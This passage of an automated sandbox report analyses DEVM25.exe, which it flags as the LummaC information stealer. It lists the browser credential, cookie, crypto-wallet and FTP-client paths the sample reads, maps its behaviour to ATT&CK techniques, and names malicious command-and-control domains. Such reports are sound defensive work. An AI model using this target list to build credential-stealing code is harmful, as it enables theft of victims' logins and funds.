Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\DEVM25.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior

Source: Yara match	File source: 00000002.00000003.1024350882.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1024777986.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DEVM25.exe PID: 1480, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: DEVM25.exe PID: 1480, type: MEMORYSTR
Source: Yara match	File source: 2.2.DEVM25.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.DEVM25.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2190447431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1035349041.0000000002BFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	22 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	251 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	22 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	3 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DEVM25.exe	74%	Virustotal		Browse
DEVM25.exe	76%	ReversingLabs	Win32.Trojan.LummaC
DEVM25.exe	100%	Avira	TR/Crypt.Agent.klxme

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://menuedgarli.shop/AUIqn	100%	Avira URL Cloud	malware
https://mrodularmall.top/aNzS6y	100%	Avira URL Cloud	malware
https://mrodularmall.top/aNzSW	100%	Avira URL Cloud	malware
https://mrodularmall.top/s	100%	Avira URL Cloud	malware
https://mrodularmall.top/aNzSY	100%	Avira URL Cloud	malware
https://featureccus.shop/bdMAn	100%	Avira URL Cloud	malware
menuedgarli.shop/AUIqn	100%	Avira URL Cloud	malware
https://mrodularmall.top/aNzSFB	100%	Avira URL Cloud	malware
https://mrodularmall.top/aNzSyb?	100%	Avira URL Cloud	malware
https://jowinjoinery.icu/P	100%	Avira URL Cloud	malware
https://mrodularmall.top/aNzSAy	100%	Avira URL Cloud	malware
https://featureccus.shop/bdMAn6	100%	Avira URL Cloud	malware
https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=13fe98fc6205fb6c6f_858247691958	0%	Avira URL Cloud	safe
https://mrodularmall.top:443/aNzS4d	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
jowinjoinery.icu	188.114.97.3	true	false	high
t.me	149.154.167.99	true	false	high
mrodularmall.top	104.21.80.1	true	false	high
featureccus.shop	unknown	unknown	false	high
menuedgarli.shop	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
bugildbett.top/bAuz	false		high
menuedgarli.shop/AUIqn	true	Avira URL Cloud: malware	unknown
https://t.me/asdawfq	false		high
cjlaspcorne.icu/DbIps	false		high
https://jowinjoinery.icu/bdWUa	false		high
mrodularmall.top/aNzS	false		high
jowinjoinery.icu/bdWUa	false		high
legenassedk.top/bdpWO	false		high
featureccus.shop/bdMAn	false		high
https://mrodularmall.top/aNzS	false		high
htardwarehu.icu/Sbdsa	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://t.me/	DEVM25.exe, 00000002.00000003.954902553.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.954941594.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.966132356.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	false		high
